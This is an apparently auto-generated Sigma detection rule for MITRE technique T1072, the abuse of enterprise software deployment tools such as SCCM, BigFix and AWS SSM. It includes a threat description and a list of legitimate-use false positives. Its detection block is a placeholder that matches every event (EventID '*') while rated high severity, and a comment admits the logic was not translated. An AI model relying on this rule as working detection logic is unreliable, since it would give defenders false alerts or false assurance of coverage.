title: Software Deployment Tools (T1072)
id: df00tech-t1072
status: experimental
description: "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications — including Microsoft SCCM/ConfigMgr, HCL BigFix, PDQ Deploy, Symantec Altiris, Microsoft Intune, Azure Arc, AWS Systems Manager (SSM), and RAdmin — are widely deployed for enterprise endpoint management. Adversaries who compromise or abuse these platforms gain the ability to execute arbitrary commands across all enrolled systems simultaneously, often running as SYSTEM or with elevated privileges. Real-world abuse includes APT32 compromising McAfee ePO for malware distribution, Sandworm Team using RemoteExec for agentless lateral movement, Medusa Group deploying ransomware payloads via BigFix and PDQ Deploy, and Threat Group-1314 abusing Altiris for network-wide propagation."
references:
  - https://attack.mitre.org/techniques/T1072/
  - https://df00tech.com/detections/T1072
author: df00tech
date: 2026/04/13
tags:
  - attack.t1072
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "SCCM/ConfigMgr routinely spawns PowerShell and cmd.exe to execute legitimate software deployment scripts, patch management, and compliance remediation — build an allowlist of authorized script names and package GUIDs from InitiatingProcessCommandLine"
  - "BigFix (HCL) and PDQ Deploy are frequently used for IT administration tasks including software installs, configuration changes, and script execution that legitimately trigger this detection during patch cycles"
  - "Intune Management Extension (IntuneManagementExtension.exe) executes PowerShell scripts deployed by administrators for device configuration, security baseline enforcement, and application installation"
  - "AWS Systems Manager Run Command legitimately executes shell commands on EC2 instances for patch management, inventory collection, and operational runbooks — tune by allowlisting known SSM document names"
  - Automated patch management tools may use certutil or bitsadmin for downloading and verifying update packages from vendor CDNs
  - "Monitoring and inventory agents (SCCM hardware inventory, BigFix relevance queries) run net.exe and systeminfo.exe on a schedule to collect asset data"
level: high